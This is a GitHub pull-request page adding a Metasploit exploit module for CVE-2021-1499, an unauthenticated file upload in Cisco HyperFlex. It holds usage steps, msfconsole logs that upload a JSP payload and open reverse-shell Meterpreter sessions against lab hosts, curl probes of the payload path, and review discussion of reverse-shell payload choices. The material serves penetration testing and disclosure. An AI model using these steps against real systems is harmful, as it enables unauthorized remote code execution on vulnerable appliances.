Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Cisco HyperFlex File Upload RCE #15333

Merged
merged 1 commit into from
Jun 17, 2021
Merged

Cisco HyperFlex File Upload RCE #15333

merged 1 commit into from
Jun 17, 2021

Conversation

jheysel-r7
Copy link
Contributor

@jheysel-r7 jheysel-r7 commented Jun 11, 2021
edited
Loading

Exploit module to leverage CVE-2021-1499: Unauthenticated file upload vulnerability in Cisco HyperFlex HX Data Platform.

Currently the module is set to use linux/x64/meterpreter_reverse_tcp by default. It uploads the war file to /var/lib/tomcat7/webapps/, the .war file gets auto deployed and then the module manually calls the .jsp file inside the deployed war file which sends a meterpreter session back to the user.

Potential Changes

It came to my attention during development that I'd likely be able to make use of a java/meterpreter payload. I'm going to continue investigating support for this.

Verification

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. Do use exploit/linux/http/cisco_hyperflex_file_upload_rce
  3. Set RHOSTS and LHOST
  4. Verify The target appears to be vulnerable (run the check method)
  5. Do run
  6. You should receive a shell, depending on network speed and victim target specifications, you may need to adjust the Wait For Shell Delay as it takes a few seconds to upload, deploy and trigger the payload. WfsDelay is currently set to 5 seconds.

Demonstration

msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set rhosts 192.168.123.145
rhosts => 192.168.123.145
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set lport 4445
lport => 4445
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > options

Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.123.145  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Base path
   UPLOAD_FILE_NAME  BqGDbpfynLmRaaa  no        Choose a filename for the payload. (Default is random)
   VHOST                              no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Dropper


msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4445 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... calling: /crossdomain.xml/BqGDbpfynLmRaaa.jsp
[+] Payload executed successfully
[*] Meterpreter session 1 opened (192.168.123.1:4445 -> 192.168.123.145:52762) at 2021-06-14 17:19:35 -0400

meterpreter > getuid
Server username: tomcat7 @ HyperFlex-Installer-4.0.2d (uid=111, gid=114, euid=111, egid=114)
meterpreter > sysinfo
Computer     : HyperFlex-Installer-4.0.2d
OS           : Ubuntu 16.04 (Linux 4.4.0-75-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@wvu wvu added the module label Jun 11, 2021
@jmartin-tech
Copy link
Contributor

@msjenkins-r7 test this please.

@jheysel-r7 jheysel-r7 marked this pull request as ready for review June 14, 2021 22:42
@wvu wvu added the docs label Jun 14, 2021
smcintyre-r7
smcintyre-r7 requested changes Jun 15, 2021
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Just left a few comments. If this is ready, I can move on to testing it once they're addressed. Looks good overall, nice work @jheysel-r7 !

modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb Show resolved Hide resolved
@smcintyre-r7 smcintyre-r7 self-assigned this Jun 15, 2021
@jheysel-r7
Copy link
Contributor Author

jheysel-r7 commented Jun 15, 2021
edited
Loading

@smcintyre-r7 Thanks for the review, much appreciated! Before wvu left for vacation they reminded me that we have native Java payloads. Wondering what your opinion is on switching from linux/x64/meterpreter_reverse_tcp to a native java payload?

** Edit: Or adding functionality to support both?

wvu
wvu suggested changes Jun 15, 2021
View reviewed changes
Copy link
Contributor

@wvu wvu left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Congrats on another module! Overall good job. Bye.

wvu
wvu reviewed Jun 15, 2021
View reviewed changes
modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
end

def exploit
app_base = 'crossdomain.xml'
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

FWIW, there are more discreet options that work with a Java payload.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I assume I need to find a payload that returns a shell automatically when it deploys itself in the tomcat7/webapps/ directory? That would remove the need to name the war file crossdomain.xml.war

I named the directory crossdomain.xml due to the nginx configuration - if named anything else I don't think I'm able to execute what's inside as I get a 301.

Success when named directory named crossdomain.xml:

➜  metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/crossdomain.xml/pngynhbplt.jsp
*   Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /crossdomain.xml/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:07:29 GMT
< Content-Type: text/html;charset=ISO-8859-1
< Content-Length: 6
< Connection: keep-alive
< Set-Cookie: JSESSIONID=9EDC41FB32DB4C8E66FDF87833703789; Path=/crossdomain.xml/; HttpOnly
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<






* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0

Unsuccessful when named something else:

➜  metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
*   Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /jsp_shell_reverse_tcp/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:06:17 GMT
< Content-Type: text/html
< Content-Length: 184
< Connection: keep-alive
< Location: https://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0

I've tried the following java payloads:

java/meterpreter/reverse_tcp
java/jsp_shell_reverse_tcp
java/shell_reverse_tcp

and am unable to get a shell without naming the directory crossdomain.xml .
I might be making an incorrect assumption with regards to how need to execute the payload once uploaded.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

There are other nginx locations that work. I was using a payload servlet. Maybe we can go over the different approaches when I come back. :)

jmartin-tech
jmartin-tech reviewed Jun 17, 2021
View reviewed changes
modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb
Comment on lines +138 to +137
register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml.war')
register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/')
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is a way to change the name as discussed here is found this will need to account for it.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

After thorough testing I haven't been able to find a way to change the name of the file while still being able to execute it. I think these will stay as is.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

FYI, these paths are incorrect, and register_dir_for_cleanup is preferred.

@jheysel-r7
Cisco HyperFlex File Upload RCE module
281fce0 
beta draft

RCE working with linux/x64/meterpreter_reverse_tcp

rubocop

Updated title, removed newlines

Responded to comments

Rubo cop offenses

Update documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb

Co-authored-by: wvu <wvu-r7@users.noreply.github.com>

Responded to comments

Rubocop offenses

Added support for Java Dropper

Made changes to Linux Dropper

Rubocop

Improved check method, changed to default staged paylod, removed TODO

Switched to single-quoted strings
@smcintyre-r7
Copy link
Contributor

Just tested this one last time and confirmed it's working as intended. I tested both targets and the Linux dropper with both a staged and unstaged payload. Both did work, but the unstaged payload does seem slightly more reliable. Since that's the default value, it seems fine.

msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > show options 

Module options (exploit/linux/http/cisco_hyperflex_file_upload_rce):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.159.250  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80               yes       The target port (TCP)
   SSL               false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                yes       Base path
   UPLOAD_FILE_NAME  DUCZwPtoIjHhLt   no        Choose a filename for the payload. (Default is random)
   VHOST                              no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > set PAYLOAD linux/x64/meterpreter_reverse_tcp 
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/cisco_hyperflex_file_upload_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Preparing payload...
[*] Uploading payload...
[+] Payload uploaded successfully
[*] Executing payload... calling: /crossdomain.xml/DUCZwPtoIjHhLt.jsp
[+] Payload executed successfully
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.250:44834) at 2021-06-17 13:38:37 -0400
[!] This exploit may require manual cleanup of '/var/lib/tomcat7/crossdomain.xml.war' on the target
[!] This exploit may require manual cleanup of '/var/lib/tomcat7/crossdomain.xml/' on the target

meterpreter > getuid
Server username: tomcat7 @ HyperFlex-Installer-4.0.2d (uid=111, gid=114, euid=111, egid=114)
meterpreter > sysinfo
Computer     : HyperFlex-Installer-4.0.2d
OS           : Ubuntu 16.04 (Linux 4.4.0-75-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

I'll have this landed in a moment, thanks @jheysel-r7 !

@smcintyre-r7 smcintyre-r7 merged commit 397c9ef into rapid7:master Jun 17, 2021
@smcintyre-r7
Copy link
Contributor

Release Notes

This adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution.

@smcintyre-r7 smcintyre-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 17, 2021
@jheysel-r7 jheysel-r7 deleted the hyperflex_file_upload_rce branch June 17, 2021 17:42
@wvu
Copy link
Contributor

wvu commented Jun 18, 2021

Excellent effort on this, @jheysel-r7. :)

@wvu wvu mentioned this pull request Jul 30, 2021
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wvu wvu wvu requested changes

@jmartin-tech jmartin-tech jmartin-tech left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@jheysel-r7 @jmartin-tech @smcintyre-r7 @wvu